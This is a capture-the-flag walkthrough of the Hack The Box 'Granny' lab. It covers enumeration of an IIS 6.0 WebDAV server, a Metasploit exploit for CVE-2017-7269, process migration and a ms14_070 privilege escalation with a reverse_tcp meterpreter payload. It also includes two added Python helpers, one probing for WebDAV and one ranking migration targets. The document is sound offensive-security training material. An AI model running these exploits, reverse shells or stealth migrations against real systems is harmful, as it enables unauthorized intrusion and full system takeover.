Granny Writeup
21 September 2022 #CTF #HTB #box #easy #windows
Note
This writeup can also be used for the 'Grandpa' box.
Enumeration
You really thought we wouldn't do an nmap scan?
$ sudo nmap -v -T4 -p- -oN enum/fulltcp.nmap 10.10.10.15
[...]
80/tcp open http
[...]
$ ports=$(awk -F/ '/^[[:digit:]]{1,5}\// {printf "%s,", $1}' enum/fulltcp.nmap)
$ sudo nmap -sC -sV -p $ports -oN enum/scripts.nmap 10.10.10.15
[...]
80/tcp open http Microsoft IIS httpd 6.0
|_http-server-header: Microsoft-IIS/6.0
| http-methods:
|_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
| http-webdav-scan:
| Server Date: Sat, 17 Sep 2022 17:35:50 GMT
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| WebDAV type: Unknown
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
|_ Server Type: Microsoft-IIS/6.0
|_http-title: Under Construction
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
[...]
HTTP
Looking at the web server, all we get is the 'Under Construction' placeholder page that nmap's http-title script already reported:
We can check if there are any interesting directories:
$ gobuster dir -u http://10.10.10.15 -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -o enum/root.gobuster
/images (Status: 301) [Size: 149] [--> http://10.10.10.15/images/]
/_private (Status: 301) [Size: 153] [--> http://10.10.10.15/%5Fprivate/]
/aspnet_client (Status: 301) [Size: 158] [--> http://10.10.10.15/aspnet%5Fclient/]
/_vti_log (Status: 301) [Size: 155] [--> http://10.10.10.15/%5Fvti%5Flog/]
/_vti_bin (Status: 301) [Size: 155] [--> http://10.10.10.15/%5Fvti%5Fbin/]
/. (Status: 200) [Size: 1433]
The _vti_* directories are FrontPage Server Extensions leftovers and /aspnet_client is the default ASP.NET client-script folder, so nothing of interest comes up here.
We have the IIS version so let's search for exploits:
$ searchsploit 'IIS 6.0'
[...]
Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow
[...]
It looks like we have something: that entry is CVE-2017-7269, a buffer overflow in the WebDAV component of IIS 6.0 on Windows Server 2003 reached through a PROPFIND request, and the nmap output above shows WebDAV (PROPFIND included) is enabled on this host.
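As an added example (not part of the original writeup), the same check done by hand: it parses the Allow/Public headers an OPTIONS request returns, lists the methods nmap would call risky, and flags the IIS 6.0 + PROPFIND combination that makes the host a CVE-2017-7269 candidate. The sample headers are the ones nmap printed above, copied into a constructed list; the target address in the commented-out live call and the risky-method list are assumptions.

```python
# Added example, not from the original writeup: reproduce by hand what
# nmap's http-methods / http-webdav-scan scripts reported, and flag the
# IIS 6.0 + WebDAV combination that makes the box a CVE-2017-7269
# candidate. The sample headers are copied from the nmap output; the
# target address and the risky-method list are assumptions.
import http.client
import re

# Methods that write to, or walk, the WebDAV tree; matches nmap's "risky" set.
RISKY = {"PUT", "DELETE", "COPY", "MOVE", "MKCOL", "PROPFIND", "PROPPATCH",
         "LOCK", "UNLOCK", "SEARCH", "TRACE"}

# Constructed sample: the OPTIONS response headers nmap showed for 10.10.10.15.
SAMPLE_HEADERS = [
    ("Server", "Microsoft-IIS/6.0"),
    ("Public", "OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, "
               "MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH"),
    ("Allow", "OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, "
              "PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK"),
]


def parse_method_headers(headers):
    """Union of the Allow and Public method lists, upper-cased.
    `headers` is a list of (name, value) pairs as http.client returns them.
    Allow is what the requested URL accepts, Public is what the whole server
    implements; that is why PUT only shows up in Public on Granny."""
    methods = set()
    for name, value in headers:
        if name.lower() in ("allow", "public"):
            methods.update(m.strip().upper() for m in value.split(",") if m.strip())
    return methods


def risky_methods(methods):
    return sorted(methods & RISKY)


def is_cve_2017_7269_candidate(server, methods):
    """Heuristic only: IIS 6.0 with PROPFIND reachable is the precondition for
    the ScStoragePathFromUrl overflow. A patched IIS 6.0 looks identical, so
    this means 'worth trying the exploit', not 'confirmed vulnerable'."""
    return bool(re.match(r"Microsoft-IIS/6\.0\b", server or "")) and "PROPFIND" in methods


def assess(server, headers):
    methods = parse_method_headers(headers)
    return {
        "methods": sorted(methods),
        "risky": risky_methods(methods),
        "cve_2017_7269_candidate": is_cve_2017_7269_candidate(server, methods),
    }


def probe(host, port=80, path="/", timeout=10):
    """Live check (needs the lab VPN): send OPTIONS, then a Depth: 0 PROPFIND,
    and return the assessment plus the PROPFIND status. 207 Multi-Status means
    WebDAV really answered; 404/405 means it is off for that path."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    conn.request("OPTIONS", path)
    r = conn.getresponse()
    headers = r.getheaders()
    r.read()
    body = ('<?xml version="1.0" encoding="utf-8"?>'
            '<D:propfind xmlns:D="DAV:"><D:allprop/></D:propfind>')
    conn.request("PROPFIND", path, body=body,
                 headers={"Depth": "0", "Content-Type": "text/xml"})
    r2 = conn.getresponse()
    r2.read()
    conn.close()
    result = assess(r.getheader("Server"), headers)
    result["propfind_status"] = r2.status
    return result


if __name__ == "__main__":
    print(assess("Microsoft-IIS/6.0", SAMPLE_HEADERS))  # offline, on the sample
    # print(probe("10.10.10.15"))                       # live, against the box
```

The candidate flag is deliberately a heuristic: the only way to know the patch state from the outside is to throw the exploit, which is what the next section does.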
Foothold
We will use the exploit/windows/iis/iis_webdav_scstoragepathfromurl Metasploit module for this because it will make the privesc much easier (and knowing how to use Metasploit is actually a useful skill to have). Set LHOST and RHOSTS, then run the exploit and we should get a meterpreter session.
Privesc
Once the meterpreter session is opened, run systeminfo to get an overview of what we're dealing with:
meterpreter > shell
[-] Failed to spawn shell with thread impersonation. Retrying without it.
Process 3060 created.
Channel 2 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
c:\windows\system32\inetsrv>systeminfo
systeminfo
Host Name: GRANNY
OS Name: Microsoft(R) Windows(R) Server 2003, Standard Edition
OS Version: 5.2.3790 Service Pack 2 Build 3790
[...]
System Type: X86-based PC
[...]
Our payload is running inside a rundll32.exe spawned by the exploited IIS worker, so it is advisable to migrate to a more stable process:
c:\windows\system32\inetsrv>exit
exit
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System
220 1064 cidaemon.exe
272 4 smss.exe
320 272 csrss.exe
344 272 winlogon.exe
392 344 services.exe
404 344 lsass.exe
580 392 svchost.exe
668 392 svchost.exe
732 392 svchost.exe
752 392 svchost.exe
788 392 svchost.exe
924 392 spoolsv.exe
952 392 msdtc.exe
1064 392 cisvc.exe
1112 392 svchost.exe
1168 392 inetinfo.exe
1204 392 svchost.exe
1316 392 VGAuthService.exe
1380 392 vmtoolsd.exe
1480 392 svchost.exe
1604 392 svchost.exe
1760 392 dllhost.exe
1940 392 alg.exe
1956 580 wmiprvse.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\wbem\wmiprvse.exe
2156 1480 w3wp.exe x86 0 NT AUTHORITY\NETWORK SERVICE c:\windows\system32\inetsrv\w3wp.exe
2180 2156 rundll32.exe x86 0 C:\WINDOWS\system32\rundll32.exe
2512 580 wmiprvse.exe
2720 580 davcdata.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\inetsrv\davcdata.exe
2784 344 logon.scr
3148 580 wmiprvse.exe
4044 1064 cidaemon.exe
4092 1064 cidaemon.exe
Only four processes show Arch/Session/Path details: those are the ones our NETWORK SERVICE token can open, while the rest belong to SYSTEM or another account and migrate would simply fail there. 2180 is the rundll32.exe we already live in (its parent, w3wp.exe 2156, is the exploited IIS worker), so pick one of the other three:
meterpreter > migrate 1956
[*] Migrating from 2180 to 1956...
[*] Migration completed successfully.
Check out this post if you want to learn about process migration in Metasploit.
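The selection rule above as code, as an added example that is not part of the original writeup: it parses meterpreter's ps table (rows with Arch/Session/User/Path are the ones our token could open, and User may be absent or contain spaces) and ranks the processes we can realistically migrate into. SAMPLE_PS is the listing from the session above copied into a constructed string; the current PID comes from the migrate output, the current user is assumed to be what getuid shows before privesc, and the ranking rule (push the exploited parent worker to the end) is my own, not Metasploit's.

```python
# Added example, not from the original writeup: parse meterpreter's `ps`
# listing and rank the processes we can migrate into. SAMPLE_PS is the
# listing from the session above, copied into a constructed string; the
# ranking rule is an assumption, not Metasploit's own logic.
import re
from dataclasses import dataclass
from typing import List, Optional

# Rows look like "PID PPID Name [Arch Session [User] Path]"; the bracketed
# columns only appear for processes our token is allowed to open.
ROW = re.compile(
    r"^\s*(?P<pid>\d+)\s+(?P<ppid>\d+)\s+(?P<name>.+?)"
    r"(?:\s+(?P<arch>x86|x64)\s+(?P<session>\d+)\s+(?P<rest>\S.*))?\s*$"
)
# User may contain spaces (NT AUTHORITY\NETWORK SERVICE) or be absent (our
# own rundll32.exe), so anchor on the drive letter that starts the path.
REST = re.compile(r"^(?:(?P<user>.*?)\s+)?(?P<path>[A-Za-z]:\\\S*)$")


@dataclass
class Proc:
    pid: int
    ppid: int
    name: str
    arch: Optional[str] = None
    session: Optional[int] = None
    user: Optional[str] = None
    path: Optional[str] = None


def parse_ps(text: str) -> List[Proc]:
    procs = []
    for line in text.splitlines():
        m = ROW.match(line)
        if not m:
            continue  # header, separator and prompt lines
        p = Proc(int(m["pid"]), int(m["ppid"]), m["name"])
        if m["arch"]:
            p.arch, p.session = m["arch"], int(m["session"])
            r = REST.match(m["rest"].strip())
            if r:
                p.user, p.path = r["user"], r["path"]
            else:
                p.path = m["rest"].strip()
        procs.append(p)
    return procs


def migration_candidates(procs: List[Proc], current_pid: int, current_user: str) -> List[Proc]:
    """Processes sharing our user, architecture and session (the only ones
    migrate can realistically succeed on), best first."""
    me = next(p for p in procs if p.pid == current_pid)
    same = [p for p in procs
            if p.pid != current_pid
            and p.user == current_user
            and p.arch == me.arch
            and p.session == me.session]

    def rank(p: Proc):
        # Our parent is the exploited IIS worker (w3wp.exe spawned the
        # rundll32.exe we live in); IIS may recycle it, so put it last.
        return (p.pid == me.ppid, p.pid)
    return sorted(same, key=rank)


CURRENT_PID = 2180                              # from "Migrating from 2180 ..."
CURRENT_USER = r"NT AUTHORITY\NETWORK SERVICE"  # assumed: getuid before privesc

# Constructed sample: the ps table from the session above.
SAMPLE_PS = r"""
PID   PPID  Name               Arch  Session  User                          Path
---   ----  ----               ----  -------  ----                          ----
0     0     [System Process]
4     0     System
220   1064  cidaemon.exe
272   4     smss.exe
320   272   csrss.exe
344   272   winlogon.exe
392   344   services.exe
404   344   lsass.exe
580   392   svchost.exe
668   392   svchost.exe
732   392   svchost.exe
752   392   svchost.exe
788   392   svchost.exe
924   392   spoolsv.exe
952   392   msdtc.exe
1064  392   cisvc.exe
1112  392   svchost.exe
1168  392   inetinfo.exe
1204  392   svchost.exe
1316  392   VGAuthService.exe
1380  392   vmtoolsd.exe
1480  392   svchost.exe
1604  392   svchost.exe
1760  392   dllhost.exe
1940  392   alg.exe
1956  580   wmiprvse.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\wbem\wmiprvse.exe
2156  1480  w3wp.exe           x86   0        NT AUTHORITY\NETWORK SERVICE  c:\windows\system32\inetsrv\w3wp.exe
2180  2156  rundll32.exe       x86   0                                      C:\WINDOWS\system32\rundll32.exe
2512  580   wmiprvse.exe
2720  580   davcdata.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\inetsrv\davcdata.exe
2784  344   logon.scr
3148  580   wmiprvse.exe
4044  1064  cidaemon.exe
4092  1064  cidaemon.exe
"""


def granny_candidates():
    procs = parse_ps(SAMPLE_PS)
    return [(p.pid, p.name) for p in migration_candidates(procs, CURRENT_PID, CURRENT_USER)]


if __name__ == "__main__":
    for pid, name in granny_candidates():
        print(f"migrate {pid}  # {name}")
```

The output puts wmiprvse.exe (1956) and davcdata.exe (2720) ahead of w3wp.exe (2156); either of the first two is fine, and 1956 is the one used above.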
Now we can run the post/multi/recon/local_exploit_suggester Metasploit module to look for privesc vectors:
meterpreter > bg
[*] Backgrounding session 1...
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1
SESSION => 1
msf6 post(multi/recon/local_exploit_suggester) > run
[...]
[+] 10.10.10.15 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[...]
The suggester's checks can time out on this old box, so run it a second time if the first pass comes back empty. Prefer the entries marked 'The target appears to be vulnerable' over 'could not be validated'; any of those should get a shell as SYSTEM, and here ms14_070_tcpip_ioctl (a tcpip.sys privilege escalation) does the job:
msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms14_070_tcpip_ioctl
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set LHOST tun0
LHOST => tun0
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set SESSION 1
SESSION => 1
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > run
[...]
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
And that's the box.
Key Takeaways
- Once you have a meterpreter session, migrate to another process for stability (and stealth) purposes; pick one that runs as your user and architecture, and avoid the exploited worker that spawned you
- On an unpatched box like this one, post/multi/recon/local_exploit_suggester gives several working kernel exploits; favour the ones it marks 'The target appears to be vulnerable' over 'could not be validated'